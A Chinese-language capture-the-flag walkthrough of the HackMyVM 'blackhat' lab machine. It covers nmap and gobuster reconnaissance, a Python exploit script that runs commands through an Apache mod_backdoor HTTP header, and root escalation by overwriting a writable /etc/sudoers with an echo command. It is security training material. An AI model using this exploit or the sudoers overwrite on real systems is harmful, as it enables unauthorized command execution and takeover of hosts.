OSCP 靶场
靶场介绍
|
blackhat |
easy |
信息收集、Apache_HTTP_Server_Module_Backdoor利用、 |
信息收集
主机发现
nmap -sn 192.168.1.0/24
端口扫描
└─# nmap -sV -A -p- -T4 192.168.1.44
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-21 02:16 EST
Nmap scan report for 192.168.1.44
Host is up (0.00076s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-title: Hacked By HackMyVM
|_http-server-header: Apache/2.4.54 (Debian)
MAC Address: 08:00:27:75:FC:80 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.76 ms 192.168.1.44
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.72 seconds
目录扫描
目录只扫描到phpinfo.php 信息
┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://192.168.1.44 -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.44
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.44/.php (Status: 403) [Size: 277]
http://192.168.1.44/.html (Status: 403) [Size: 277]
http://192.168.1.44/index.html (Status: 200) [Size: 1437]
http://192.168.1.44/.php (Status: 403) [Size: 277]
http://192.168.1.44/.html (Status: 403) [Size: 277]
http://192.168.1.44/phpinfo.php (Status: 200) [Size: 69322]
http://192.168.1.44/server-status (Status: 403) [Size: 277]
http://192.168.1.44/logitech-quickcam_W0QQcatrefZC5QQfbdZ1QQfclZ3QQfposZ95112QQfromZR14QQfrppZ50QQfsclZ1QQfsooZ1QQfsopZ1QQfssZ0QQfstypeZ1QQftrtZ1QQftrvZ1QQftsZ2QQnojsprZyQQpfidZ0QQsaatcZ1QQsacatZQ2d1QQsacqyopZgeQQsacurZ0QQsadisZ200QQsaslopZ1QQsofocusZbsQQsorefinesearchZ1.html (Status: 403) [Size: 277]
Progress: 5095332 / 5095336 (100.00%)
===============================================================
Finished
===============================================================
结合首页的提示check backboor,再phpinfo信息中找到服务器使用了mod_backdoor模块
权限获取
https://github.com/WangYihang/Apache-HTTP-Server-Module-Backdoor/blob/master/exploit.py#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import sys
def exploit(host, port, command):
headers = {
"Backdoor": command
}
url = "http://%s:%d/" % (host, port)
response = requests.get(url, headers=headers)
content = response.content
print content
def main():
if len(sys.argv) != 3:
print "Usage : "
print "tpython %s [HOST] [PORT]" % (sys.argv[0])
exit(1)
host = sys.argv[1]
port = int(sys.argv[2])
while True:
command = raw_input("$ ")
if command == "exit":
break
exploit(host, port, command)
if __name__ == "__main__":
main()使用exp 获取权限
权限提升
这里发现免密su 到了darkdante 账号
使用如下命令检查我们有写入权限的目录或文件,可以发现 sudoers文件 可以写入
find / -writable 2>/dev/null | grep -v -E "proc|dev"
darkdante@blackhat:~$ getfacl /etc/sudoers
getfacl: Removing leading '/' from absolute path names
# file: etc/sudoers
# owner: root
# group: root
user::r--
user:darkdante:rw-
group::r--
mask::rw-
other::---既然可以写入,那么我们直接添加如下参数,然后使用sudo 执行/bin/bash 提权的root 权限
echo "darkdante ALL=(ALL:ALL) /bin/bash" > /etc/sudoers
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【OSCP】blackhat
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论